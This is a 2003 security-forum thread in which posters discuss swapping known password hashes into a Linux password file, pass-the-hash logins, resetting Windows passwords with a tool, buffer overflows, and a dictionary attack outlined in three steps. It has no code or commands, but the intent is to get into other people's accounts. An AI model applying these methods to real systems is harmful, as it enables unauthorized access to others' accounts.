UGN Security
Posted By: Chasm Newbs question on password files - 08/07/03 09:56 PM
A little help here would be much appreciated. I was wondering about password files. I know quite a bit about how to crack them, and why the passwords cant be reversed. So I was wondering, why dont you just modify the password file, so that the encypted part is the same as an encrypted password you know. I hope someone understands me!!! Ill try and explain what I mean, if people dont understand me
Posted By: SilentRage Re: Newbs question on password files - 08/07/03 10:24 PM
usually you can do that very thing. I've remarked before how sending encrypted passwords on a network isn't very secure. Just because you can't figure out the original password, doesn't mean you can't login with the encrypted form. Unfortunately you'd have to be pretty experienced in protocols and programming to make use of that. You'd have to be able to sniff networks and code yourself some programs to take advantage.

There's a program called ERD Commander which overwrites NT/2K/XP passwords from dos. It doesn't take but a second to do it.
Posted By: Chasm Re: Newbs question on password files - 08/08/03 12:29 AM
Thanks for that, i mean with regards to linux, as opposed to Windows though. I hope you understand what I mean. Lets suppose your linux password is "password", so you look in your pwd file, copy the encrypted version of "password". Then theoretically all you should need to do, is replace any password in a different password file to what you just copied, you should be able to log in as that user using your password. Is that what you thought I meant.

I totally agree with you on plaintext passwords, I understand the principals ( but dont have much experience), and think that anyone with an ounce of common sense would realise what a danger it can be. Specially when anyone can get there hands on a packet sniffer, and "easily" read them.
Posted By: SilentRage Re: Newbs question on password files - 08/08/03 08:09 PM
I wasn't talking about plaintext passwords. I was talking about encrypted passwords being no better than plaintext. That you don't need to see the plaintext. Just use the encrypted password.

And what you said is very imaginative. I heartily support a test to see if it actually works. There's a chance that it won't though - like if they use the username as a key to decrypt the password. Who knows. Just try it and report back to us on the results.
Posted By: jonconley Re: Newbs question on password files - 08/08/03 09:17 PM
Yes. In some situations it can work. As can removing the password field altogether.

Now if you are talking about linux specifically, a big problem may be that there are alot of ways to get ahold of the file, but attempting to write to the file and writing to it (to use the hash you know) is opening a whole new can of worms.
Posted By: Chasm Re: Newbs question on password files - 08/08/03 10:20 PM
I'm currently experimenting with it, I've written a small program in C++ that sort of does it, but am having no joy in getting access. I have a few more ideas, will post source soon, if it works wink

A friend recommended using a buffer overflow to write to the password file, so far I've had not much luck with that.

Thanks for the advice
Posted By: superpozition Re: Newbs question on password files - 08/08/03 10:52 PM
Chasm

here is what i do. Say you get someones password file and you want to decrypt some of those passwords, you obviously can't write a program to decrypt them but what you can do is this:

1) Get a huge list of words (possible a dictionary list)
2) In linux they have a standard algorithm they use for encrypting those plaintext passwords into encrypted text. Search for it and use the code in your program to encrypt all the words in your dictionary file.
3) now all you have to do is write a little program which will loop through and try and match your encryted dictionary file with your password file.

Simple stuff isn't it?
© UGN Security Forum